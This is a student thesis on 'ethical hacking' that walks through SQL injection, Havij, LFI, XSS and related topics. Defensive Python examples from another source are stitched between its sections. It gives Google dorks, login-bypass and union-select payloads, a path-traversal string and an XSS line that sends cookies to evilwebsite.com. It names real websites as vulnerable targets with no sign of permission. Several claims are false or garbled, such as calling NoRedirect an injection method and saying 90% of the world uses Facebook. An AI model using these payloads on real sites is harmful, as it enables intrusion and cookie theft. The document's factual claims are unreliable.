
ETHICAL HACKING

By Sakib Abdullah
Dated 7th March, 2023
Arena Batch No: 42 (Delta)

Declaration By Student:

I, Sakib Abdullah, a student of ARENA WEB SECURITIES batch 42 (Delta), hereby declare
that the work presented here was done by me under the supervision of Mr. Tanjim Al Fahim.
It is not being published or submitted elsewhere for the requirement of a degree program.
Any literature, data or work done by others and cited within this thesis has been given
due acknowledgement and is listed in the references.

Sakib Abdullah

Place: Arena Web Security

Date: 7th March 2023

Certificate:

Certified that the thesis entitled "Ethical Hacking", submitted by Sakib Abdullah towards
partial fulfillment of the Course of Ethical Hacking conducted by the institution Arena Web
Security, is based on the investigation and learning done so far, from the beginning of the
course, carried out under our guidance. The thesis has therefore not been submitted for the
academic award of any other university or institution.

Countersigned: ....................................... (Tanjim Al Fahim), Supervisor

Signature: ..................................... (Sakib Abdullah), Batch: 42 (Delta)

Abstract:
Ethical hacking, also known as "white hat hacking," is a practice of attempting to hack into a
computer system or network in order to find and fix security vulnerabilities before malicious
hackers can exploit them.

Ethical hackers are security professionals who use the same techniques and tools as
malicious hackers, but with the permission of the system owners and with the goal of
identifying and fixing weaknesses. This process can involve a variety of techniques, including
penetration testing, vulnerability scanning, and social engineering, among others.

The ultimate goal of ethical hacking is to improve the security of computer systems and
networks by identifying and patching vulnerabilities before they can be exploited by
malicious hackers. Ethical hacking is an important part of any comprehensive security
strategy, and it helps organizations to protect their valuable assets and sensitive data from
cyber attacks.

Acknowledgement:

I would like to express my sincere gratitude to our honorable course instructor
and supervisor Tanjim Al Fahim Sir, Ashif Sir, Jewel Sir and all the authorities of
AWS for their continuous advice, effort and valuable guidance throughout the
research. I am really grateful to them. I would also like to thank all my course
mates of this course who advised, helped and made suggestions whenever I got stuck
at some point during the entire course.

Thank you.

Table of contents:

1. BASIC SQL INJECTION 5 – 7
2. HAVIJ 8 – 9
3. NOREDIRECT 10
4. MANUAL SQL INJECTION 11 – 12
5. LOCAL FILE INCLUSION (LFI) 12 – 14
6. CROSS-SITE SCRIPTING (XSS) 15 – 17
7. DDOS 17
8. GRABIFY 18
9. OSINT 18 – 19
10. MALWARE 20 – 21
11. SOCIAL MEDIA ACCOUNT RECOVER 22
12. HTTP & HTTPS 23
13. BLACKLIST REMOVAL 24
14. CONCLUSION 24

Basic SQL Injection:

SQL Injection is a vulnerability that allows data to be manipulated by injecting code
through a website's input. SQL injection usually occurs when you ask a user for input,
like their username/userid, and instead of a name/id the user gives you an SQL statement
that you will unknowingly run on your database.

First, we have to know what the vulnerability of a website is. A web vulnerability is a
flaw in a website's or web application's code that allows an attacker to gain some level
of control of the site, and possibly the hosting server. Whether the vulnerability is
large or small, of low or high severity, as long as it exists it is possible for the bad
guys or attackers to exploit it.

So to find such a vulnerable website, we need the help of Google Dorks.

What is a Google Dork?

Google hacking is a computer hacking technique that uses Google Search and other Google
applications to find security holes in the configuration and computer code that websites
use. Using Google Dorks we can find websites that have such vulnerabilities.

First, we need to search on Google using Google Dorks. Here are some examples of Google
Dorks compiled to find SQL injections:

inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:view_product.php?id=

There are different ways to attack and get access to a website. In this part, we have
learned about basic SQL injection.

User: 1' or '1'='1
Pass: 1' or '1'='1

By using this username and password, we can access the admin panel of many websites.
The working method of this injection is as follows.

Every website on the internet has a database. Normally the login is rejected when we
enter an incorrect username and the query evaluates to false. But if we put the above
string in the username and password fields, the database will evaluate the condition as
true and grant the attacker unauthorised access.

Example:
http://www.covid19maluku.com/

https://technopk.com/
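As an added example (not from the original thesis), the following Python code shows why the `1' or '1'='1` login bypass works when the query is built by string concatenation, and why it fails against a parameterized query. The users table and passwords are constructed sample data.

```python
import sqlite3

# Constructed sample data: one admin user with a made-up password
# (real applications would store password hashes, not plaintext).
SAMPLE_USERS = [("admin", "s3cret-admin-pw"), ("guest", "guest-pw")]

# The bypass string quoted in the text above, used for both fields.
PAYLOAD = "1' or '1'='1"


def build_db():
    """Create an in-memory users table (constructed, not a real site's schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def build_login_sql_unsafe(user, pw):
    """The vulnerable pattern: user input pasted straight into the SQL text."""
    return ("SELECT username FROM users WHERE username = '" + user
            + "' AND password = '" + pw + "'")


def login_vulnerable(conn, user, pw):
    """Runs the concatenated query. With the payload the WHERE clause becomes
    username='1' OR '1'='1' AND password='1' OR '1'='1', which is true for
    every row, so the first user (admin) is returned without any password."""
    row = conn.execute(build_login_sql_unsafe(user, pw)).fetchone()
    return row[0] if row else None


def login_parameterized(conn, user, pw):
    """Hardened version: bound parameters keep the payload as a plain string
    value that is compared against the column, so no row matches."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (user, pw)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = build_db()
    print("injected SQL :", build_login_sql_unsafe(PAYLOAD, PAYLOAD))
    print("vulnerable   :", login_vulnerable(db, PAYLOAD, PAYLOAD))      # admin
    print("parameterized:", login_parameterized(db, PAYLOAD, PAYLOAD))   # None
```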
HAVIJ:

Havij is an SQL injection tool that aids in the discovery and exploitation of
SQL vulnerabilities on websites. The working method of Havij is as follows.

First of all, we have to install Havij on our PC, and we must recognize that our
PC's Windows Defender must be disabled; otherwise, Windows will not allow
Havij to be installed on the computer.

After opening the Havij tool, we have to put the target URL in the target field and click
Analyze, and Havij will begin analyzing. We receive information after a few minutes.
After the analysis, we click on Tables and then click Get Tables. Then we'll have a
list of tables from which to choose our desired one, and after that we'll have to click
Get Columns; we'll then have a list of columns from which to choose the desired ones,
then click Get Data, and we'll get our final data.

We can get data from Havij by following the steps outlined above.

To work with Havij, we must keep in mind that the "s" must be removed from "https" and
only "http" put in the target box.

We should keep in mind that Havij only works on dynamic websites that have a PHP id
parameter with a numeric value such as 1, 2, 3, etc. For instance, php?id=29.

Some Google Dorks:

1: intitle:"index" of "admin" site:.in (or another domain name)
2: intitle:"index" of "admin" "framework" site:.in (or another domain name)
3: intitle:"index" of "admin" "pdf" site:.in (or another domain name)
4: intitle:"index" of "admin" "gallery" site:.in (or another domain name)
5: intitle:"index" of "admin" "image" site:.in (or another domain name)
6: intitle:"index" of "admin" "upload" site:.in (or another domain name)
7: intitle:"index" of "admin" "banner" site:.in (or another domain name)
8: intitle:"index" of "admin" "file" site:.in (or another domain name)
9: intitle:"index" of "admin" "page" site:.in (or another domain name)
10: intitle:"index" of "admin" "news" site:.in (or another domain name)

http://www.megaplanet.co.th/project-details.php?id=26

http://www.pha.org.pk/sro_list.php?catid=1
NO REDIRECT:

Noredirect is another method of SQL injection. To use this method, we have to use a
browser named "Cyberfox". After installing Cyberfox, we go to the Tools menu and select
NoRedirect. Then click "Add" and enter the URL link whose redirect we want to block.

With the NoRedirect add-on, we have blocked the redirect away from the admin page.

After that, we will search with the same link below, removing the letters after
"admin". If it still won't take us to the dashboard, then we have to look for another
address for the admin panel. For this, we will go to the next step below.

Example:
https://www.hotfm.com.pk/admin/login.php
Manual SQL Injection:

To perform manual SQL injection, we must have a dynamic website, such as
http://www.megaplanet.co.th/project-details.php?id=26. We find a vulnerable website by
adding a single quote (') to the parameter.

Every website has a database where all its information is kept. In every database, the
main information is stored in columns and rows. So first of all, we will find out how
many columns there are on this website by using:

6 order by 1-- (INT)
6' order by 1--+ (STRING)

[6 is the value of the id, as in php?id=6, and 1 is the number of columns being tested.]

6 union select 1,2,3,4,5,6-- (INT)
6' union select 1,2,3,4,5,6--+ (STRING)

[The columns are numbered 1-6 in sequence. We might have to prefix the id with - or .,
like id=-6 or id=.6]

After this step, we see which column is reflected in the page and use that column to
get the database contents.

The following steps are used for the attack:

Union based -> DIOS MySQL -> DIOS by WAF (if one does not work, try another one).
(Copy the DIOS payload and execute it in a new tab.)

Then get data from those columns:

6 union select 1,2,3,4,5,group_concat(column name) from (__data name__)-- (INT)
6' union select 1,2,3,4,5,group_concat(column name) from (__data name__)--+ (STRING)
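As an added example that is not part of the thesis, this Python detector applies the manual SQL injection patterns described above (the single-quote probe, order by, union select, group_concat, the `--`/`--+` terminators, and non-numeric values in an id parameter that should be numeric) to constructed access-log lines, the way a defender would triage a web server log. The log lines, IPs, paths and the set of numeric parameters are all made up for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache-style access-log lines (made-up IPs, paths and times).
LOG_LINES = [
    '203.0.113.5 - - [07/Mar/2023:10:00:01 +0600] "GET /product.php?id=26 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [07/Mar/2023:10:00:07 +0600] "GET /product.php?id=6%27%20order%20by%201--%2B HTTP/1.1" 500 310',
    '203.0.113.5 - - [07/Mar/2023:10:00:12 +0600] "GET /product.php?id=-6%20union%20select%201,2,3,4,5,6-- HTTP/1.1" 200 4870',
    '198.51.100.9 - - [07/Mar/2023:10:01:30 +0600] "GET /product.php?id=6%27%20Union%20select%201,2,3,4,5,group_concat(name)%20from%20users--%2B HTTP/1.1" 200 6010',
    '198.51.100.9 - - [07/Mar/2023:10:02:00 +0600] "GET /about.php HTTP/1.1" 200 2200',
]

# Common log format: ip ident user [time] "METHOD target PROTO" status size
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Signatures for the probes described in the text (matched after URL decoding).
SIGNATURES = [
    ("order-by-probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union-select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("group-concat", re.compile(r"\bgroup_concat\s*\(", re.I)),
    ("comment-terminator", re.compile(r"(?:--\s*\+?|#)\s*$")),
]
# Parameters this (assumed) application only ever uses with numeric values.
NUMERIC_PARAMS = {"id", "catid"}


def analyse_value(name, value):
    """Return the list of finding labels for one decoded query parameter."""
    findings = [label for label, rx in SIGNATURES if rx.search(value)]
    if value.count("'") % 2 == 1:          # the lone ' used to test for injection
        findings.append("unbalanced-quote")
    if name.lower() in NUMERIC_PARAMS and not re.fullmatch(r"\d+", value):
        findings.append("non-numeric-" + name.lower())
    return findings


def scan_log(lines):
    """Parse each request line, decode its query string and collect the
    parameters that trigger at least one finding."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue                        # not a request line we understand
        target = urlsplit(m.group("target"))
        # parse_qsl percent-decodes names and values (and turns + into space)
        for name, value in parse_qsl(target.query, keep_blank_values=True):
            findings = analyse_value(name, value)
            if findings:
                hits.append({"ip": m.group("ip"), "path": target.path,
                             "status": int(m.group("status")),
                             "param": name, "value": value,
                             "findings": findings})
    return hits


def suspicious_ips(hits):
    """Sorted list of client IPs with at least one flagged request."""
    return sorted({h["ip"] for h in hits})


if __name__ == "__main__":
    results = scan_log(LOG_LINES)
    for h in results:
        print(h["ip"], h["status"], h["param"], "=", repr(h["value"]), h["findings"])
    print("suspicious:", suspicious_ips(results))
```

The 500 response on the order-by probe is the kind of corroborating signal worth alerting on: a syntax error leaking back to the client is exactly what the manual technique looks for.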

Local File Inclusion (LFI):

A file inclusion vulnerability is a type of web vulnerability that is most commonly
found to affect web applications that rely on scripting at run time. This issue is caused
when an application builds a path to executable code using an attacker-controlled
variable in a way that allows the attacker to control which file is executed at run time.
A file include vulnerability is distinct from a generic directory traversal attack, in that
directory traversal is a way of gaining unauthorized file system access, and a file
inclusion vulnerability subverts how an application loads code for execution.
Successful exploitation of a file inclusion vulnerability will result in remote code
execution on the web server that runs the affected web application. An attacker can
use remote code execution to create a web shell on the web server, which can be used
for website defacement.

LFI stands for "local file inclusion." A local file inclusion bug is found when a
developer includes user input in a PHP file. Local file inclusion (LFI) is similar to
a remote file inclusion vulnerability, except that instead of including remote files, only
local files, i.e., files on the current server, can be included for execution. This issue
can still lead to remote code execution by including a file that contains
attacker-controlled data, such as the web server's access logs.

An attacker can use Local File Inclusion (LFI) to trick the web application into exposing
or running files on the web server. An LFI attack may lead to information disclosure,
remote code execution, or even cross-site scripting (XSS). Typically, LFI occurs when an
application uses the path to a file as input. If the application treats this input as
trusted, a local file may be used in the include statement.

LFI is not a very common vulnerability. Not every website has a local file inclusion
vulnerability. It is present in 1% of web applications on average. LFI can be
dangerous when combined with other vulnerabilities; for example, if the attacker is
able to upload malicious files to the server. Even if the attacker cannot upload files,
they can use the LFI vulnerability together with a directory traversal vulnerability
to access sensitive information.

How LFI works:

When an application includes a file named by user input without properly validating it,
this is known as a local file inclusion. By tampering with the input, an attacker can use
this weakness to include harmful files.

By replacing the end of the URL with (../../../../../../../../../etc/passwd), the server
reads the URL and includes the requested file, returning its contents or running harmful
files.

For example
http://www.scsi4me.com/display.php?page=Contact.php&nav_title=Contact Us

http://www.bharathcateringcollege.com/index.php?page=contact.php
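As an added example (not from the thesis or from any of the sites mentioned), this Python code models the vulnerable `include($_GET['page'])` pattern beside a hardened resolver that rejects the `../../../../etc/passwd` traversal shown above. The web root path and the page allow-list are assumed values.

```python
import posixpath

# Assumed web root holding the includable page files (hypothetical path).
WEB_ROOT = "/var/www/pages"
# Assumed allow-list of page names the application is prepared to include.
ALLOWED_PAGES = {"index.php", "contact.php", "about.php"}

# The traversal payload from the text above (constructed request value).
TRAVERSAL = "../../../../../../../../../etc/passwd"


def resolve_include_unsafe(page):
    """Models include($_GET['page']) relative to the web root with no checks:
    '..' segments walk straight out of the root, and an absolute value
    replaces the root entirely."""
    return posixpath.normpath(posixpath.join(WEB_ROOT, page))


def resolve_include_safe(page):
    """Hardened resolver: the value must be a bare file name on the allow-list,
    and the final path is re-checked to stay inside WEB_ROOT. In real code the
    last check should use the OS realpath so symlinks are resolved too."""
    if page != posixpath.basename(page):
        raise ValueError("directory components or '..' are not allowed")
    if page not in ALLOWED_PAGES:
        raise ValueError("unknown page")
    candidate = posixpath.normpath(posixpath.join(WEB_ROOT, page))
    if posixpath.commonpath([WEB_ROOT, candidate]) != WEB_ROOT:
        raise ValueError("path escapes the web root")
    return candidate


def include_allowed(page):
    """True when the hardened resolver accepts the page value."""
    try:
        resolve_include_safe(page)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for value in ("contact.php", TRAVERSAL, "/etc/passwd", "contact.php/../../etc/hosts"):
        print(f"{value!r:45} unsafe -> {resolve_include_unsafe(value)!r:32} "
              f"safe accepts: {include_allowed(value)}")
```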
Cross Site Scripting (XSS):

Cross-site scripting (XSS) is a type of security vulnerability that can be found in some web
applications. XSS attacks enable attackers to inject client-side scripts into web pages
viewed by other users. A cross-site scripting vulnerability may be used by attackers to
bypass access controls such as the same-origin policy. Cross-site scripting carried out on
websites accounted for roughly 84% of all security vulnerabilities documented by
Symantec up until 2007. [1] XSS effects vary in range from petty nuisances to significant
security risks, depending on the sensitivity of the data handled by the vulnerable site and
the nature of any security mitigation implemented by the site's owner network.

If a web page or web application employs unsanitized user input in the output it generates, it
is susceptible to XSS. The victim's browser must parse this user input. ActiveX, Flash,
VBScript, and even CSS all support XSS attacks. Nonetheless, they are most frequently seen
in JavaScript, mainly since JavaScript is used for the majority of browser activities.

If a site has an XSS flaw, the problem is that it is not only JavaScript or malicious
code that gets injected; in many cases it can lead to malware, phishing, or other injection.

JavaScript is a cross-platform, object-oriented scripting language. A big advantage
of JavaScript is that it can do a lot of work or produce a lot of output with the help
of very small programs or pieces of code. In other words, JavaScript is a client-side
scripting language (that is, the user's web browser will run or execute these
scripts) or browser scripting language (a simple and short form of programming
language).

A hacker can do whatever he wants, including phishing, keylogging, and cookie theft.

How XSS works:

Here's an example:

<script>
i=new/**/Image();isrc=http://evilwebsite.com/log.php?'+document.cookie+'
'+document.location</script>

While the payload is usually JavaScript, XSS can take place using any
client-side language.

To carry out a cross site scripting attack, an attacker injects a malicious script into
user-provided input. Attackers can also carry out an attack by modifying a
request. If the web app is vulnerable to XSS attacks, the user-supplied input
executes as code. For example, in the request below, the script displays a message
box with the text “xss.”
http://www.site.com/page.php?var=<script>alert('xss');</script>
There are many ways to trigger an XSS attack. For example, the execution could
be triggered automatically when the page loads or when a user hovers over
specific elements of the page (e.g., hyperlinks).
Potential consequences of cross site scripting attacks include these:

∙ Capturing the keystrokes of a user.
∙ Redirecting a user to a malicious website.
∙ Running web browser-based exploits (e.g., crashing the browser).
∙ Obtaining the cookie information of a user who is logged into a website (thus
compromising the victim's account).

In some cases, the XSS attack leads to a complete compromise of the victim's
account. Attackers can trick users into entering credentials on a fake form,
which provides all the information to the attacker.

https://www.brothersfurniture.com.bd/search/reading-table/?q=table
https://www.q-files.com/search
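As an added example not taken from the thesis, the following Python code takes the reflected `var=<script>alert('xss');</script>` request described above and shows the vulnerable echo beside context-aware output encoding, with a Content-Security-Policy header as defence in depth. The page template and the header set are constructed for the example.

```python
import html
from urllib.parse import quote

# The reflected payload from the request shown above (the value of ?var=).
PAYLOAD = "<script>alert('xss');</script>"


def render_unsafe(var):
    """Vulnerable echo: the query parameter is pasted into the HTML as-is,
    so a <script> tag in it is parsed and run by the victim's browser."""
    return ("<p>You searched for: " + var + "</p>\n"
            '<a href="/page.php?var=' + var + '">again</a>')


def render_safe(var):
    """Context-aware output encoding: HTML-escape the value where it lands in
    element content (quote=True also covers attribute contexts), and
    percent-encode it where it is placed inside a URL."""
    return ("<p>You searched for: " + html.escape(var, quote=True) + "</p>\n"
            '<a href="/page.php?var=' + quote(var, safe="") + '">again</a>')


def response_headers():
    """Defence in depth: a CSP that forbids inline scripts means even a
    missed escape will not execute an injected <script> block."""
    return {"Content-Type": "text/html; charset=utf-8",
            "Content-Security-Policy": "default-src 'self'; script-src 'self'"}


def contains_script_tag(markup):
    """Check used to show the difference: is a live <script> element present?"""
    return "<script" in markup.lower()


if __name__ == "__main__":
    print("unsafe:", render_unsafe(PAYLOAD), sep="\n")
    print("safe:", render_safe(PAYLOAD), sep="\n")
    print("headers:", response_headers())
```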

DDOS:
A distributed denial-of-service (DDoS) attack occurs when multiple systems flood the
bandwidth or resources of a targeted system, usually one or more web servers. A DDoS
attack uses more than one unique IP address or machine, often from thousands of hosts
infected with malware.

A website has some limited access, like a few users using it at the same time. If
many users use the same website at the same time, then the website has traffic and
the server does not respond.

If a hacker wants to take down a website, he/she does a DDoS by brute force. By brute
forcing, the hacker makes many abnormal users (bots) log in to or use the website at
the same time, so that the site goes down. Because the server was only built for a few
users visiting the website at once, it does not respond well. That is how DDoS works.

GRABIFY:

Grabify is a URL shortening service that shortens lengthy URLs and offers extra
detailed information, such as IP logging. The link shortener Grabify was first developed
to stop people from catfishing others. Nevertheless, since the website's introduction
in 2014, users have discovered a variety of other applications for it, including
website analytics and an IP logging daemon that records users' IPs each time they switch
on their PCs, so they have a record of everything.

OSINT:
OSINT is the short form of Open Source Intelligence. Open Source Intelligence (OSINT)
is a method of gathering information from public or other open sources that can be
used by security experts, national intelligence agencies, or cybercriminals. When
used by cyber defenders, the goal is to discover publicly available information related
to their organization that could be used by attackers and take steps to prevent those
future attacks.

Here are three methods commonly used to gather open source intelligence data.

Passive Collection:

This is the most commonly used way to gather OSINT intelligence. It involves scraping
publicly available websites, retrieving data from open APIs such as the Twitter API, or
pulling data from deep web information sources. The data is then parsed and organized for
consumption.

Semi-Passive:

This type of collection requires more expertise. It directs traffic to a target server to
obtain information about the server. Scanner traffic must be similar to normal
Internet traffic to avoid detection.

Active Collection:

This type of information collection interacts directly with a system to gather information
about it. Active collection systems use advanced technologies to access open ports and scan
servers or web applications for vulnerabilities.

This type of data collection can be detected by the target and reveals the reconnaissance
process. It leaves a trail in the target’s firewall, Intrusion Detection System (IDS), or
Intrusion Prevention System (IPS). Social engineering attacks on targets are also considered
a form of active intelligence gathering.
MALWARE:

Malware, or malicious software, is any program or file that is intentionally harmful
to a computer, network, or server.

Computer viruses, worms, Trojan horses, ransomware, and spyware are examples of
malware. These harmful applications steal, encrypt, and erase private information.
They also change or hijack fundamental computer operations and track end users'
online behavior.

Malware is able to infiltrate networks and devices and is designed with the
intention of negatively affecting such devices, networks, and/or their users. This
damage may manifest itself to the user or endpoint in many ways depending on the
type of malware and its objective. Malware can have very benign and minor effects
in some situations, but it can also have devastating effects in others. No matter the
technique, all malware is created to take advantage of devices at the expense of the
user and in favor of the hacker—the person who created and/or used the software.

Types of malware:

• Computer viruses
• Trojan horses
• Rootkits
• Ransomware
• Keyloggers
• Grayware
• Fileless malware
• Adware
• Malvertising
• Spyware
• Backdoors
• Browser hijackers
• Malicious mobile apps
• Hybrid malware

How to Prevent Malware:

To prevent malware, it's vital to use a defence-in-depth strategy that focuses on
technical and non-technical solutions. Phishing emails are one of the most common
infection paths, so it's vital to educate employees about phishing and to avoid
downloading doubtful add-ons or engaging with suspicious emails. Also look out for
doubtful domains or typosquatting that masquerades as legitimate websites. Don't
download third-party apps on Android devices and avoid clicking pop-up ads.

How to Detect Malware:

There are several general symptoms that may indicate the presence of malware
on your device:

1- Your device is running slower than usual
2- You notice a shortage of available storage space
3- Pop-ups and annoying programs appear on your device
4- Your sensitive data has been exposed

How to Remove Malware:

Anti-malware (antivirus) programs block and remove some or all types of malware. For
example, Microsoft Security Essentials (Windows XP, Vista, and Windows 7) and Windows
Defender (Windows 8, 10 and 11) deliver real-time protection. The Windows Malicious
Software Removal Tool removes malicious software from the device.

SOCIAL MEDIA ACCOUNT RECOVER:

Nowadays, social media is a famous activity around the world. Almost 90% of the
world's population uses Facebook, Instagram, Twitter, and Whatsapp, but Facebook is
the most popular app.

In our city, most users forget their Facebook passwords after a few months, and
sometimes hackers want to access their accounts because of their short passwords
and weak verification.

The simple recovery method for Facebook passwords is:

1. Go to the Facebook login page and click "Forgot password".
2. After you do that, put your email or phone number in the search bar.
3. Facebook sends a verification code to your phone or email.
4. A new page opens after you enter the verification code into Facebook.
5. Then Facebook will ask you to put in a new password.

This is the formal process to recover an account.

There are many other processes to recover a hacked account or a disabled account.

HTTP & HTTPS:
The full form of HTTP is Hypertext Transfer Protocol. HTTP offers a set of rules and
standards that govern how any information can be transmitted on the World Wide Web.
HTTP provides standard rules for web browsers and servers to communicate. HTTP is an
application-layer network protocol that is built on top of TCP. HTTP uses
hypertext-structured text, which establishes the logical link between nodes containing text.
It is also known as "stateless protocol," as each command is executed separately without
using reference to the previous run command.

HTTPS stands for Hyper Text Transfer Protocol Secure. It is a highly advanced and secure
version of HTTP. It uses port 443 for data communication. It allows for secure transactions
by encrypting the entire communication with SSL. It is a combination of the SSL/TLS
protocol and HTTP. It provides encrypted and secure identification of a network server.

HTTPS also allows you to create a secure, encrypted connection between the server and
the browser. It offers bi-directional security for data. This helps you protect potentially
sensitive information from being stolen.

In the HTTPS protocol, SSL transactions are negotiated with the help of a key-based
encryption algorithm. This key is generally either 40 or 128 bits in strength.

Advantages of HTTP

∙ HTTP can be implemented with other protocols on the Internet or on other networks.
∙ HTTP pages are stored in computer and internet caches, so they are quickly accessible.
∙ Platform-independent, which allows cross-platform porting.
∙ Does not need any runtime support.
∙ Usable over firewalls! Global applications are possible.
∙ Not connection-oriented, so there is no network overhead to create and
maintain session state and information.

Advantages of HTTPS

∙ In most cases, sites running over HTTPS will have a redirect in place. Therefore,
even if you type in HTTP://, it will redirect to HTTPS over a secured connection.
∙ It allows users to perform secure e-commerce transactions, such as online banking.
∙ SSL technology protects all users and builds trust.
∙ An independent authority verifies the identity of the certificate owner. So each
SSL certificate contains unique, authenticated information about the certificate owner.

BLACKLIST REMOVAL:

If your IP address is blacklisted and you want to examine it, you have to visit the blacklist's
website and do a lookup on your IP address. Most blacklist databases will provide general
listing reasons but won't list exact email addresses tied to blacklisted IP addresses. If you
are able to find out why you were blacklisted, you can try to get the listing removed. You
want to work with someone who is technically sound to better help you. To start with, take
time to confirm that your network and mail server are configured properly and all the details
are in order for resolving the issue, as prescribed by the blacklist. For example, they may
ask you to provide accurate forward and reverse DNS records, as well as SMTP banners.

You can do the following:

• Scan all computers on your network for viruses.
• See if there are any known and needed patches (updates and fixes) for your operating
system.
• Configure routers more strongly.
• Create and apply stronger passwords.

You want to be removed from any blacklists because databases frequently share IP addresses
that have been recorded. If you think you have fixed things on your end, go back to the
blacklist site and follow their instructions for the IP address removal process.

Conclusion:

I would like to say that this course has enriched my knowledge of ethical hacking,
not to harm others but to know how an exploit or attack might happen so that we can
keep ourselves alert to any kind of attack from attackers. The prime purpose of
ethical hacking is to prevent sensitive data from falling into enemy hands. It
safeguards your company from blackmail by those willing to exploit the
vulnerabilities. Through real world testing, you can enhance your digital network
security and prevent security breaches.
